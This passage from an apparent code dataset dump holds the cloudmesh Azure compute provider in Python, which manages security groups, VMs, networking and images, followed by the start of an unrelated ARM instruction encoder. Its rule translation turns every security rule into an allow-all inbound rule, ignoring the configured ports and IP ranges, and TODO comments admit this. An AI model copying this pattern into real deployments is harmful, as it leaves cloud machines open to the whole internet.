metadata\n\n        :param name:\n        :param key:\n        :return:\n        \"\"\"\n        if name is None:\n            name = self.VM_NAME\n\n        tags_dict = self.get_server_metadata(name)\n\n        if key is not None:\n            try:\n                tags_dict.pop(key)\n            except KeyError:\n                print(\"Key \" + key + \" not found\")\n\n        async_vm_tag_updates = self.vms.update(self.GROUP_NAME, name,\n                                               {\n                                                   'tags': tags_dict\n                                               })\n        async_vm_tag_updates.wait()\n\n        return async_vm_tag_updates.result().tags\n\n    def list_secgroups(self, name=None):\n        \"\"\"\n        List the security group by name\n\n        :param name: The name of the group, if None all will be returned\n        :return:\n        \"\"\"\n        local_sec_groups = self._get_local_sec_groups(name)\n        Console.info('Local security groups: ')\n        [Console.info(str(i)) for i in local_sec_groups]\n\n        az_sec_groups = self._get_az_sec_groups(name)\n        Console.info('Az security groups: ')\n        [Console.info(str(i.__dict__)) for i in az_sec_groups]\n\n        return local_sec_groups\n\n    def _get_az_sec_groups(self, name=None):\n        \"\"\"\n        gets azure sec groups\n\n        :param name:\n        :return:\n        \"\"\"\n        groups = self.network_client.network_security_groups.list(\n            self.GROUP_NAME)\n        ret = []\n        for res in groups:\n            if name is not None:\n                if name == res.name:\n                    ret.append(res)\n            else:\n                ret.append(res)\n\n        return ret\n\n    def _get_local_sec_groups(self, name=None):\n        \"\"\"\n        gets local sec groups from db\n\n        :param name:\n        :return:\n        \"\"\"\n        # if name is none, return all the groups, else filter the groups by name\n        query = {} if name is None else {'name': name}\n\n        local_sec_group = \\\n            self.cmDatabase.collection('local-secgroup').find(query)\n\n        if local_sec_group.count() == 0:\n            raise ValueError(f'No security groups were found in '\n                             f'local db for: {name}')\n\n        res = list(local_sec_group)\n\n        return _remove_mongo_id_obj(res)\n\n    def _get_local_sec_rules(self, group_name=None):\n        \"\"\"\n        gets local sec rules from db\n\n        :param group_name:\n        :return:\n        \"\"\"\n        # if group_name is none, return all sec rules\n        sec_rules = None\n        if group_name is None:\n            sec_rules = list(\n                self.cmDatabase.collection('local-secrule').find({}))\n        else:\n            group = self._get_local_sec_groups(group_name)\n            query = {'name': {'$in': group[0]['rules']}}\n            sec_rules = list(\n                self.cmDatabase.collection('local-secrule').find(query)\n            )\n\n        return _remove_mongo_id_obj(sec_rules)\n
    def list_secgroup_rules(self, name='default'):\n        \"\"\"\n        List the security group rules for the provided Network Security Group\n\n        :param name: The name of the group\n        :return:\n        \"\"\"\n        local_sec_rules = self._get_local_sec_rules(name)\n        Console.info(f'local security rules for \\'{name}\\': '\n                     f'{str(local_sec_rules)}')\n\n        try:\n            az_sec_rules = self.network_client.security_rules.list(\n                self.GROUP_NAME, name)\n            Console.info(f'az security rules for \\'{name}\\': ')\n            [Console.info(i.__str__()) for i in az_sec_rules]\n        except CloudError as e:\n            Console.warning(\"Error in pulling sec rules: \" + str(e))\n\n    def _sec_rules_local_to_az(self, sec_rule_names):\n        \"\"\"\n        translate local rules to azure sec rules\n\n        :param sec_rule_names:\n        :return:\n        \"\"\"\n        # local rules from the db\n        sec_rules = self.cmDatabase.collection('local-secrule').find(\n            {'name': {'$in': sec_rule_names}})\n\n        az_sec_rules = []\n        priority = 100\n        for rule in sec_rules:\n            az_rule = SecurityRule(\n                protocol=self.protocol_str_map.get(rule['protocol'].lower()),\n                name=rule['name'],\n                access='Allow',  # todo: can only set Allows!\n                direction='Inbound',  # todo: add appropriate\n                source_address_prefix='*',  # todo: add appropriate\n                destination_address_prefix='*',  # todo: add appropriate\n                source_port_range='*',  # todo: add appropriate\n                destination_port_range='*',  # todo: add appropriate\n                priority=priority\n            )\n            az_sec_rules.append(az_rule)\n            priority = priority + 1\n\n        return az_sec_rules\n\n    def _add_local_sec_group(self, name, description):\n        \"\"\"\n        adds sec group locally to db\n\n        :param name:\n        :param description:\n        :return:\n        \"\"\"\n        add_group = {\n            \"description\": description,\n            \"rules\": [],\n            \"name\": name,\n            \"cm\": {\n                \"kind\": \"secgroup\",\n                \"name\": name,\n                \"cloud\": \"local\",\n                \"collection\": \"local-secgroup\",\n                \"created\": str(datetime.now()),\n                \"modified\": str(datetime.now())\n            }\n        }\n\n        self.cmDatabase.collection('local-secgroup').insert_one(add_group)\n        return add_group\n\n    def _add_az_sec_group(self, name):\n        \"\"\"\n        adds sec group to azure\n\n        :param name:\n        :return:\n        \"\"\"\n        parameters = {\n            'location': self.LOCATION,\n        }\n\n        result_add_security_group = self.network_client. \\\n            network_security_groups.create_or_update(self.GROUP_NAME, name,\n                                                     parameters)\n\n        return result_add_security_group.result()\n
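\n    # Hypothetical end-to-end flow for the secgroup helpers around here (all\n    # names are illustrative, not from the original code):\n    #\n    #     p = Provider(name='azure')\n    #     p.add_secgroup('web', 'allow web traffic')\n    #     p.add_secgroup_rule(name='http', port='80:80', protocol='tcp', ip_range='0.0.0.0/0')\n    #     p.add_rules_to_secgroup(secgroupname='web', newrules=['http'])\n    #     p.upload_secgroup('web')  # pushes the group and its rules to Azure\n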
    def add_secgroup(self, name=None, description=None):\n        \"\"\"\n        Adds the sec group locally\n        :param name: Name of the group\n        :param description: The description\n        :return:\n        \"\"\"\n        if name is None:\n            name = 'default'\n\n        try:\n            local_sec_group = self._get_local_sec_groups(name)[0]\n            Console.info(f\"local sec group: {str(local_sec_group)}\")\n        except ValueError:\n            local_sec_group = self._add_local_sec_group(name, description)\n            Console.warning(f'{name} sec group is not found! Created new '\n                            f'group: {str(local_sec_group)}')\n\n        # self._add_az_sec_group(name)\n\n        Console.info(\"sec group created successfully!\")\n        return local_sec_group\n\n    def add_secgroup_rule(self,\n                          name=None,  # group name\n                          port=None,\n                          protocol=None,\n                          ip_range=None):\n        \"\"\"\n        Adding sec rule to the local db as azure does not support explicit sec\n        rules\n        :param name:\n        :param port:\n        :param protocol:\n        :param ip_range:\n        :return:\n        \"\"\"\n        # todo: change these defaults\n        protocol = \"tcp\" if protocol is None else protocol\n        ip_range = \"0.0.0.0/0\" if ip_range is None else ip_range\n        port = \"22:22\" if port is None else port\n        name = \"ssh\" if name is None else name\n\n        add_rule = self.update_dict({\n            \"protocol\": protocol,\n            \"ip_range\": ip_range,\n            \"ports\": port,\n            \"name\": name,\n        }, kind='secrule')[0]\n\n        self.cmDatabase.collection('local-secrule').insert_one(add_rule)\n\n        return add_rule\n\n    def remove_secgroup(self, name=None):\n        \"\"\"\n        Delete the named security group\n\n        :param name: The name of the Security Group to be deleted\n        :return:\n        \"\"\"\n\n        del_group = self.network_client.network_security_groups. \\\n            delete(self.GROUP_NAME, name)\n        del_group.wait()\n        Console.info(f'Security group {name} deleted from Az!')\n\n    def upload_secgroup(self, name=None):\n        \"\"\"\n        Takes the security group from the local db and push it to az\n        :param name:\n        :return:\n        \"\"\"\n        local_group = self._get_local_sec_groups(name)[0]\n\n        # transform local rules to az rule objects\n        az_rules = self._sec_rules_local_to_az(local_group['rules'])\n\n        # add az sec group\n        self._add_az_sec_group(name)\n\n        # push az rules\n        results = []\n        for az_rule in az_rules:\n            ret = self.network_client.security_rules.create_or_update(\n                self.GROUP_NAME,\n                local_group['name'],\n                az_rule.name,\n                az_rule\n            )\n\n            results.append(ret.result().as_dict())\n\n        return results\n\n    def _check_local_rules_available(self, rules):\n        \"\"\"\n        checks if local rules available\n\n        :param rules:\n        :return:\n        \"\"\"\n        sec_rules = self.cmDatabase.collection('local-secrule').find(\n            {'name': {'$in': rules}})\n        rule_names = {i['name'] for i in sec_rules}\n\n        if len(rule_names) != len(rules):\n            # fixed: the original compared a count against the list itself\n            raise ValueError(f'Some of the security rules are not available: '\n                             f'{str(rules)}')\n
    def add_rules_to_secgroup(self, secgroupname=None, newrules=None):\n        \"\"\"\n        Adds the rules to the local sec group only! It will update the az sec\n        group once it is uploaded\n        :param secgroupname:\n        :param newrules:\n        :return:\n        \"\"\"\n        if secgroupname is None and newrules is None:\n            raise ValueError(\"name or rules are None\")\n\n        if not isinstance(newrules, list):\n            raise ValueError('rules should be a list')\n\n        sec_group = self._get_local_sec_groups(secgroupname)[0]\n        current_rules = set(sec_group['rules'])\n\n        # check if the rules are already available\n        self._check_local_rules_available(newrules)\n\n        current_rules.update(newrules)\n\n        cm = sec_group['cm']\n        cm.update({\"modified\": str(datetime.now())})\n\n        update = {\"$set\": {\"rules\": list(current_rules), \"cm\": cm, }}\n        query = {'name': secgroupname}\n\n        self.cmDatabase.collection('local-secgroup').update_one(query, update)\n\n        return self._get_local_sec_groups(secgroupname)[0]\n\n    def remove_rules_from_secgroup(self, name=None, rules=None):\n        \"\"\"\n        removes rules from a secgroup both locally and from the azure group\n        :param name:\n        :param rules:\n        :return:\n        \"\"\"\n\n        local_group = self._get_local_sec_groups(name)[0]\n        new_rules = local_group['rules']\n        # plain loops instead of side-effect list comprehensions\n        for i in rules:\n            new_rules.remove(i)\n\n        cm = local_group['cm']\n        cm.update({\"modified\": str(datetime.now())})\n\n        update = {\"$set\": {\"rules\": new_rules, \"cm\": cm, }}\n        query = {'name': name}\n\n        self.cmDatabase.collection('local-secgroup').update_one(query, update)\n        Console.info(f'Security rules {str(rules)} removed locally!')\n\n        if isinstance(rules, list):\n            for r in rules:\n                self.network_client.security_rules.delete(self.GROUP_NAME,\n                                                          name, r).wait()\n        else:\n            self.network_client.security_rules.delete(self.GROUP_NAME,\n                                                      name,\n                                                      rules).wait()\n        Console.info(f'Security rules {str(rules)} removed from az!')\n\n    def create(self, name=None,\n               image=None,\n               size=None,\n               location=None,\n               timeout=180,\n               key=None,\n               secgroup=None,\n               ip=None,\n               user=None,\n               public=True,\n               group=None,\n               metadata=None,\n               flavor=None,\n               **kwargs):\n        \"\"\"\n        creates a named node\n\n        :param name: the name of the node\n        :param image: the image used\n        :param size: the size of the image\n        :param timeout: a timeout in seconds that is invoked in case the image\n                        does not boot. 
The default is set to 3 minutes.\n :param kwargs: additional arguments passed along at time of boot\n :param location:\n :param key:\n :param secgroup:\n :param ip:\n :param user:\n :param public:\n :param group:\n :param metadata:\n :param flavor:\n :return:\n\n \"\"\"\n if group is None or group == \"default\":\n group = self.GROUP_NAME\n\n if name is None:\n name = self.VM_NAME\n\n if secgroup is None:\n secgroup = 'default'\n\n if ip is None:\n pub_ip = self.find_available_public_ip()[0]\n else:\n pub_ip = self._get_az_public_ip(ip)\n\n if key is None:\n key = self.user\n\n if flavor is None:\n flavor = 'Standard_B1s'\n\n vm_parameters = self._create_vm_parameters(name, secgroup, pub_ip, key,\n flavor)\n banner(\"Creating Server\")\n Console.msg(f\" Name: {name}\")\n Console.msg(f\" User: {user}\")\n Console.msg(f\" IP: {pub_ip['name']}\")\n Console.msg(f\" Image: {image}\")\n Console.msg(f\" Size: {size}\")\n Console.msg(f\" Public: ?\")\n Console.msg(f\" Key: {key}\")\n Console.msg(f\" Location: {location}\")\n Console.msg(f\" Timeout: {timeout}\")\n Console.msg(f\" Secgroup: {secgroup}\")\n Console.msg(f\" Group: {group}\")\n Console.msg(\"\")\n\n vm = self.vms.create_or_update(\n group,\n name,\n vm_parameters).result()\n\n Console.info('VM created: ' + vm.name)\n\n # todo data disk creation is taken off due to cost limitations!\n # disks_count = len(\n # list(self.compute_client.disks.list_by_resource_group(group)))\n #\n # # Creating a Managed Data Disk\n # async_disk_creation = self.compute_client.disks.create_or_update(\n # group,\n # f\"{self.OS_DISK_NAME}_{disks_count}\",\n # {\n # 'location': self.LOCATION,\n # 'disk_size_gb': 8,\n # 'creation_data': {\n # 'create_option': 'Empty'\n # }\n # }\n # )\n # data_disk = async_disk_creation.result()\n #\n # # Get the virtual machine by name\n # virtual_machine = self.vms.get(\n # group,\n # name\n # )\n #\n # # Attaching Data Disk to a Virtual Machine\n # virtual_machine.storage_profile.data_disks.append({\n # 'lun': 0,\n # 'name': data_disk.name,\n # 'create_option': 'Attach',\n # 'managed_disk': {\n # 'id': data_disk.id\n # }\n # })\n # updated_vm = self.vms.create_or_update(\n # group,\n # name,\n # virtual_machine\n # )\n # updated_dict = updated_vm.result().as_dict()\n\n updated_dict = vm.as_dict()\n updated_dict['status'] = 'ACTIVE'\n updated_dict['ssh_key_name'] = key\n\n _, pub_ip = self._get_pub_ip_for_vm(updated_dict)\n updated_dict['public_ip'] = pub_ip['ip_address']\n\n updated_dict['key'] = key\n updated_dict['secgroup'] = secgroup\n\n local_group = self._get_local_sec_groups(secgroup)[0]\n updated_dict['secrule'] = local_group['rules']\n\n return self.update_dict(updated_dict, kind='vm')[0]\n\n def _get_local_key_content(self, key_name):\n \"\"\"\n gets local key content from cb\n\n :param key_name:\n :return:\n \"\"\"\n query = {'name': key_name}\n\n key = list(self.cmDatabase.collection('local-key').find(query))\n\n if len(key) == 0:\n raise ValueError(f'Unable to find key: {key_name}')\n\n return key[0]\n\n def _create_vm_parameters(self, name, secgroup, ip, key, flavor):\n \"\"\"\n Create the VM parameters structure.\n :param secgroup: sec group name\n :param ip: az PublicIP object as dict\n :param key: pub key content\n :return:\n \"\"\"\n\n nic = self._create_az_nic(secgroup, ip)\n\n # # Parse Image from yaml file\n publisher, offer, sku, version = self.default[\"image\"].split(\":\")\n\n # Declare Virtual Machine Settings\n vm_parameters = {\n 'location': self.LOCATION,\n 'os_profile': {\n 'computer_name': 
name,\n 'admin_username': self.USERNAME,\n 'admin_password': self.PASSWORD,\n 'linux_configuration': {\n 'ssh': {\n 'public_keys': [{\n 'path': \"/home/\" + self.USERNAME +\n \"/.ssh/authorized_keys\",\n 'key_data':\n str(self._get_local_key_content(key)\n ['public_key']),\n }]\n }\n }\n },\n 'hardware_profile': {\n 'vm_size': flavor,\n },\n 'storage_profile': {\n 'image_reference': {\n 'publisher': publisher,\n 'offer': offer,\n 'sku': sku,\n 'version': version\n },\n 'os_disk': {\n 'name': f\"{self.OS_DISK_NAME}_{name}\",\n 'create_option': 'FromImage',\n 'disk_size_gb': 64,\n 'managed_disk': {\n 'storage_account_type': 'Premium_LRS',\n }\n }\n },\n 'network_profile': {\n 'network_interfaces': [{\n 'id': nic.id,\n }]\n },\n }\n\n return vm_parameters\n\n def _create_az_sec_group_if_not_exists(self, sec_group_name):\n \"\"\"\n creates azure sec group if not exists (by name)\n\n :param sec_group_name:\n :return:\n \"\"\"\n az_group = self._get_az_sec_groups(sec_group_name)\n\n if len(az_group) > 0:\n Console.info(f\"secgroup {sec_group_name} exists!\")\n else:\n self.upload_secgroup(sec_group_name)\n\n def _create_az_vnet_if_not_exists(self):\n \"\"\"\n creates azure virtual network\n\n :return:\n \"\"\"\n for vnet in self.network_client.virtual_networks.list(self.GROUP_NAME):\n if vnet.name == self.VNET_NAME:\n Console.info(f\"vnet {vnet.name} exists!\")\n return vnet\n\n async_vnet_creation = \\\n self.network_client.virtual_networks.create_or_update(\n self.GROUP_NAME,\n self.VNET_NAME,\n {\n 'location': self.LOCATION,\n 'address_space': {\n 'address_prefixes': ['10.0.0.0/16']\n }\n }\n )\n res = async_vnet_creation.result()\n Console.info(\"VNET created: \" + res.name)\n return res\n\n def _create_az_subnet_if_not_exits(self, secgroup):\n \"\"\"\n creates azure subnet\n\n :param secgroup:\n :return:\n \"\"\"\n for subnet in self.network_client.subnets.list(self.GROUP_NAME,\n self.VNET_NAME):\n if subnet.name == self.SUBNET_NAME:\n Console.info(f\"subnet {subnet.name} exists!\")\n return subnet\n\n subnet_params = {\n 'address_prefix': '10.0.0.0/24',\n 'network_security_group': {\n 'id': self._get_az_sec_groups(name=secgroup)[0].id\n }\n }\n\n async_subnet_creation = self.network_client.subnets.create_or_update(\n self.GROUP_NAME,\n self.VNET_NAME,\n self.SUBNET_NAME,\n subnet_parameters=subnet_params,\n )\n\n res = async_subnet_creation.result()\n Console.info(\"Subnet created: \" + res.name)\n return res\n\n def _create_az_nic(self, secgroup, ip):\n \"\"\"\n Create a Network Interface for a Virtual Machine\n\n :param secgroup:\n :param ip:\n :return:\n \"\"\"\n # A Resource group needs to be in place\n self._get_resource_group()\n\n # create sec group\n self._create_az_sec_group_if_not_exists(secgroup)\n\n # Create Virtual Network\n Console.info('Creating Vnet')\n vnet = self._create_az_vnet_if_not_exists()\n\n # Create Subnet\n Console.info('Creating Subnet')\n subnet = self._create_az_subnet_if_not_exits(secgroup)\n\n # Create NIC\n Console.info('Creating NIC')\n\n # each vm needs a nic. 
so, use self.NIC_NAME as a prefix for the NICs\n nic_count = len(\n list(self.network_client.network_interfaces.list(self.GROUP_NAME)))\n\n nic_params = {\n 'location': self.LOCATION,\n 'ip_configurations': [{\n 'name': self.IP_CONFIG_NAME,\n 'subnet': {\n 'id': subnet.id\n },\n 'public_ip_address': {\n 'id': ip['id']\n }\n }],\n 'network_security_group': {\n 'id': subnet.network_security_group.id,\n }\n }\n\n nic = self.network_client.network_interfaces.create_or_update(\n self.GROUP_NAME,\n f\"{self.NIC_NAME}_{nic_count}\",\n parameters=nic_params,\n ).result()\n\n Console.info(\"NIC created: \" + nic.name)\n\n return nic\n\n def start(self, group=None, name=None):\n \"\"\"\n start a node\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :return: The dict representing the node\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n if name is None:\n name = self.VM_NAME\n\n # Start the VM\n Console.info('Starting Azure VM')\n async_vm_start = self.vms.start(group, name)\n async_vm_start.wait()\n return self.info(group, name, 'ACTIVE')\n\n def reboot(self, group=None, name=None):\n \"\"\"\n restart/reboot a node\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :return: The dict representing the node\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n if name is None:\n name = self.VM_NAME\n\n # Restart the VM\n Console.info('Restarting Azure VM')\n async_vm_restart = self.vms.restart(group, name)\n async_vm_restart.wait()\n\n return self.info(group, name, 'REBOOT')\n\n def stop(self, group=None, name=None):\n \"\"\"\n stops the node with the given name\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :return: The dict representing the node including updated status\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n if name is None:\n name = self.VM_NAME\n\n # Stop the VM\n Console.info('Stopping Azure VM')\n async_vm_stop = self.vms.power_off(group, name)\n async_vm_stop.result()\n return self.info(group, name, 'SHUTOFF')\n\n def resume(self, group=None, name=None):\n \"\"\"\n resume the named node since Azure does not handle resume it uses start\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :return: The dict representing the node including updated status\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n if name is None:\n name = self.VM_NAME\n\n return self.start(group, name)\n\n def suspend(self, group=None, name=None):\n # TODO: Joaquin -> Completed\n \"\"\"\n suspends the node with the given name since Azure does not handle\n suspend it uses stop\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :return: The dict representing the node including updated status\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n if name is None:\n name = self.VM_NAME\n\n return self.vms.power_off(group, name).result()\n\n def info(self, group=None, name=None, status=None):\n \"\"\"\n gets the information of a node with a given name\n list VM in resource group\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :param status: TODO\n :return: dict representing the node including updated status\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n\n if name is None:\n name = self.VM_NAME\n\n node = self.vms.get(group, name, expand='instanceView')\n\n nodedict = node.as_dict()\n\n az_status = 
node.instance_view.statuses[-1].code.lower()\n nodedict['status'] = _get_az_vm_status(az_status)\n\n return self.update_dict(nodedict, kind='vm')\n\n def status(self, name=None):\n \"\"\"\n gets the status of a VM by name\n\n :param name:\n :return:\n \"\"\"\n return self.info(name=name)[0]['status']\n\n def list(self):\n \"\"\"\n List all Azure Virtual Machines from my Account\n\n :return: dict\n \"\"\"\n az_servers = []\n\n for vm in self.vms.list(self.GROUP_NAME):\n v = vm.as_dict()\n local_vm = self._get_local_vm(v['name'], quiet=True)\n\n if local_vm is None:\n Console.warning(\"no local vm found for \" + v['name'])\n\n v.update(local_vm)\n az_servers.append(v)\n\n return self.update_dict(az_servers, kind=\"vm\")\n\n def destroy(self, name=None):\n \"\"\"\n Destroys the node\n\n :param name: the name of the node\n :return: the dict of the node\n \"\"\"\n if name is None:\n vms = self.list()\n else:\n vms = filter(lambda x: x['name'] == name, self.list())\n\n # Delete vms\n res = []\n for vm in vms:\n elm = {}\n Console.info('Deleting Azure Virtual Machine')\n del_vm = self.vms.delete(self.GROUP_NAME, vm['name'])\n del_vm.wait()\n\n elm['name'] = vm['name']\n elm['status'] = 'TERMINATED'\n elm['type'] = vm['type']\n elm['location'] = vm['location']\n res.append(elm)\n\n res = self.update_dict(res, kind='vm')\n\n # # Delete Resource Group\n Console.info('Deleting Azure Resource Group')\n async_group_delete = \\\n self.resource_client.resource_groups.delete(self.GROUP_NAME)\n async_group_delete.wait()\n\n return res\n\n def images(self, **kwargs):\n \"\"\"\n Lists the images on the cloud\n\n :param kwargs:\n :return: dict\n \"\"\"\n region = self.LOCATION\n\n image_list = list()\n\n result_list_pub = self.imgs.list_publishers(\n region,\n )\n i = 0\n\n for publisher in result_list_pub:\n if i < 5:\n try:\n result_list_offers = self.imgs.list_offers(\n region,\n publisher.name,\n )\n\n for offer in result_list_offers:\n try:\n result_list_skus = self.imgs.list_skus(\n region,\n publisher.name,\n offer.name,\n )\n\n for sku in result_list_skus:\n try:\n result_list = self.imgs.list(\n region,\n publisher.name,\n offer.name,\n sku.name,\n )\n\n for version in result_list:\n try:\n result_get = self.imgs.get(\n region,\n publisher.name,\n offer.name,\n sku.name,\n version.name,\n )\n\n msg = 'PUBLISHER: {0}, OFFER: {1}, SKU: {2}, VERSION: {3}'.format(\n publisher.name,\n offer.name,\n sku.name,\n version.name,\n )\n Console.debug_msg(str(msg))\n image_list.append(result_get)\n except:\n print(\n \"Something failed in result_list\")\n\n except:\n print(\n \"Something failed in result_list_skus\")\n\n except:\n print(\"Something failed in result_list_offers\")\n\n except:\n print(\"Something failed in result_list_pub\")\n i = i + 1\n return self.get_list(image_list, kind=\"image\")\n\n def flavors(self):\n \"\"\"\n Lists the flavors on the cloud\n\n :return: dict of flavors\n \"\"\"\n vm_sizes_list = self.compute_client.virtual_machine_sizes.list(\n location=self.LOCATION)\n\n return self.get_list(vm_sizes_list, kind=\"flavor\")\n\n def flavor(self, name=None):\n \"\"\"\n Gets the flavor with a given name\n\n :param name: The name of the flavor\n :return: The dict of the flavor\n \"\"\"\n return self.find(self.flavors(), name=name)\n\n # noinspection PyMethodMayBeStatic\n def find(self, elements, name=None):\n \"\"\"\n Finds an element in elements with the specified name.\n\n :param elements: The elements\n :param name: The name to be found\n :return:\n \"\"\"\n\n for element in elements:\n if 
element[\"name\"] == name or element[\"cm\"][\"name\"] == name:\n return element\n return None\n\n def image(self, name=None, **kwargs):\n \"\"\"\n Gets the image with a given nmae\n\n :param name: The name of the image\n :param kwargs:\n :return: the dict of the image\n \"\"\"\n return self.find(self.images(**kwargs), name=name)\n\n def get_list(self, d, kind=None, debug=False, **kwargs):\n \"\"\"\n Lists the dict d on the cloud\n\n :param d:\n :param kind:\n :param debug:\n :param kwargs:\n :return: dict\n \"\"\"\n if self.vms:\n entries = []\n for entry in d:\n entries.append(entry.as_dict())\n if debug:\n pprint(entries)\n\n return self.update_dict(entries, kind=kind)\n return None\n\n def rename(self, name=None, destination=None):\n # TODO: Azure Provider rename function not implemented\n \"\"\"\n rename a node\n\n :param destination:\n :param name: the current name\n :return: the dict with the new name\n \"\"\"\n # if destination is None, increase the name counter and use the new name\n # must return dict\n\n HEADING(c=\".\")\n return None\n\n def update_dict(self, elements, kind=None):\n \"\"\"\n The cloud returns an object or list of objects With the dict method this\n object is converted to a cloudmesh dict. Typically this method is used\n internally.\n\n :param elements: the elements\n :param kind: Kind is image, flavor, or node, secgroup and key\n :return:\n \"\"\"\n\n if elements is None:\n return None\n elif type(elements) == list:\n _elements = elements\n else:\n _elements = [elements]\n d = []\n\n for entry in _elements:\n\n if \"cm\" not in entry.keys():\n entry['cm'] = {}\n\n entry[\"cm\"].update({\n \"kind\": kind,\n \"driver\": self.cloudtype,\n \"cloud\": self.cloud,\n \"name\": entry['name']\n })\n\n if kind == 'vm':\n if 'created' not in entry[\"cm\"].keys():\n entry[\"cm\"][\"created\"] = str(datetime.utcnow())\n entry[\"cm\"][\"updated\"] = str(datetime.utcnow())\n entry[\"cm\"][\"name\"] = entry[\"name\"]\n entry[\"cm\"][\"type\"] = entry[\n \"type\"] # Check feasibility of the following items\n entry[\"cm\"][\"location\"] = entry[\n \"location\"] # Check feasibility of the following items\n if 'status' in entry.keys():\n entry[\"cm\"][\"status\"] = str(entry[\"status\"])\n if 'ssh_key_name' in entry.keys():\n entry[\"cm\"][\"ssh_key_name\"] = str(entry[\"ssh_key_name\"])\n\n elif kind == 'flavor':\n\n entry[\"cm\"][\"created\"] = str(datetime.utcnow())\n entry[\"cm\"][\"name\"] = entry[\"name\"]\n entry[\"cm\"][\"number_of_cores\"] = entry[\"number_of_cores\"]\n entry[\"cm\"][\"os_disk_size_in_mb\"] = entry[\"os_disk_size_in_mb\"]\n entry[\"cm\"][\"resource_disk_size_in_mb\"] = entry[\n \"resource_disk_size_in_mb\"]\n entry[\"cm\"][\"memory_in_mb\"] = entry[\"memory_in_mb\"]\n entry[\"cm\"][\"max_data_disk_count\"] = entry[\n \"max_data_disk_count\"]\n entry[\"cm\"][\"updated\"] = str(datetime.utcnow())\n\n elif kind == 'image':\n\n entry['cm']['created'] = str(datetime.utcnow())\n entry['cm']['updated'] = str(datetime.utcnow())\n entry[\"cm\"][\"name\"] = entry[\"name\"]\n\n elif kind == 'secgroup':\n\n entry[\"cm\"][\"name\"] = entry[\"name\"]\n entry['cm']['created'] = str(datetime.utcnow())\n entry['cm']['updated'] = str(datetime.utcnow())\n\n elif kind == 'key':\n\n entry['cm']['created'] = str(datetime.utcnow())\n entry['cm']['updated'] = str(datetime.utcnow())\n\n elif kind == 'secrule':\n\n entry['cm']['created'] = str(datetime.utcnow())\n entry['cm']['updated'] = str(datetime.utcnow())\n\n d.append(entry)\n # VERBOSE(d, verbose=10)\n\n return d\n\n def 
wait(self,\n vm=None,\n interval=None,\n timeout=None):\n \"\"\"\n waits for completion (all the methods are implemented synchronously! hence this just\n lists vms)\n\n :param vm:\n :param interval:\n :param timeout:\n :return:\n \"\"\"\n return self.list()\n","sub_path":"cloudmesh/azure/compute/Provider.py","file_name":"Provider.py","file_ext":"py","file_size_in_byte":57995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"353701559","text":"def conduct(instruction_mapping): \n cmds = {'ADD': '00101000', 'SUB': '00100101', 'OR': '00111000', #001, 1\n 'STR': '01011000', 'LDR': '01011001',\n 'MOVW': '00110000', 'MOVT': '00110100',\n 'B': '1010'}\n cond = {'AL': '1110', 'NE': '0001', 'PL': '0101'}\n\n instructions_list = []\n \n for x in instruction_mapping: \n if x[0] in ['MOVW', 'MOVT']:\n register_number = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(x[2], 16)))[2:]\n immediate_value = f'{\"0\"*(16-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{immediate_value[0:4]}{register_number}{immediate_value[4:8]}{immediate_value[8:12]}{immediate_value[12:16]}\"\n \n # print(pattern)\n elif x[0] == 'ADD':\n source_register = '{:04b}'.format(int(x[2].replace('R','')))\n destination_register = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(x[3], 16)))[2:]\n immediate_value = f'{\"0\"*(12-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{source_register}{destination_register}{immediate_value}\"\n \n # print(pattern) \n elif x[0] == 'LDR':\n source_register = '{:04b}'.format(int(x[2].replace('R','')))\n destination_register = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(\"0\", 16)))[2:]\n immediate_value = f'{\"0\"*(12-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{source_register}{destination_register}{immediate_value}\"\n \n # print(pattern)\n elif x[0] == 'OR':\n source_register = '{:04b}'.format(int(x[2].replace('R','')))\n destination_register = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(x[3], 16)))[2:]\n immediate_value = f'{\"0\"*(12-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{source_register}{destination_register}{immediate_value}\"\n\n # print(pattern)\n elif x[0] == 'STR':\n source_register = '{:04b}'.format(int(x[2].replace('R','')))\n destination_register = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(\"0\", 16)))[2:]\n immediate_value = f'{\"0\"*(12-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{source_register}{destination_register}{immediate_value}\"\n \n # print(pattern)\n elif x[0] == 'SUB':\n source_register = '{:04b}'.format(int(x[2].replace('R','')))\n destination_register = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(x[3], 16)))[2:]\n immediate_value = f'{\"0\"*(12-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{source_register}{destination_register}{immediate_value}\"\n \n # print(pattern)\n elif x[0] == 'BNE':\n immbin = str(bin(int(x[1], 16)))[2:]\n immediate_value = f'{\"0\"*(4-len(immbin))}{immbin}'\n pattern = '00011010' + immediate_value\n \n # print(pattern)\n elif x[0] == 'B': \n immbin = str(bin(int(x[1], 16)))[2:]\n immediate_value = f'{\"0\"*(4-len(immbin))}{immbin}'\n pattern = '11101010' + immediate_value\n \n # print(pattern)\n print(' '.join([pattern[a:a+4] for a in range(0, len(pattern), 4)]))\n 
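# Aside (editorial sketch, stdlib only): save_to_kernel() below packs each
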